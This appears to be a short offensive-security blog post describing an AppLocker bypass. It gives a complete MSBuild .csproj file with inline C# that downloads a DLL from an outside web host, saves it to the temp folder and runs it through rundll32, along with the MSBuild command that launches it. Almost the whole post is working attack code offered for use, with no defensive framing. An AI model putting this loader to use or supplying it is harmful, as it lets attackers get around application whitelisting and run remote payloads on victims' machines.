AppLocker Bypass 3
Posted: 06-21-2025
This is useful in environments where AppLocker enforces a strict policy, blocking the execution of most binaries.
The following .csproj file allows you to fetch and execute a DLL.
Execute the .csproj with a command such as:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\USER\Desktop\test.csproj
Verify that you call the proper exported function, like StartW.
Language: Markup
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTest />
</Target>
<UsingTask
TaskName="MSBuildTest"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using Microsoft.Build.Utilities;
public class MSBuildTest : Task
{
public override bool Execute()
{
byte[] shellcode;
// Use newer TLS protocols
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
using (var client = new WebClient())
{
client.BaseAddress = "https://website.com/static/";
shellcode = client.DownloadData("http_x64.dll");
}
// Save to temp file
string tempFilePath = Path.Combine(Path.GetTempPath(), "http_x64.dll");
File.WriteAllBytes(tempFilePath, shellcode);
// Execute using rundll32.exe
Process process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "C:\\Windows\\System32\\rundll32.exe",
Arguments = "\"" + tempFilePath + "\",StartW",
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false,
CreateNoWindow = true
}
};
process.Start();
process.WaitForExit();
Console.WriteLine(process.StandardOutput.ReadToEnd());
Console.WriteLine(process.StandardError.ReadToEnd());
return process.ExitCode == 0;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>